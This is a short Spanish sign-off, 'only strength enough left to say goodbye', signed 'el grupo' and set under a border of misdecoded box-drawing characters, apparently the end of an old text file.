ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Solo nos quedan fuerzas para decir, adios....
el grupo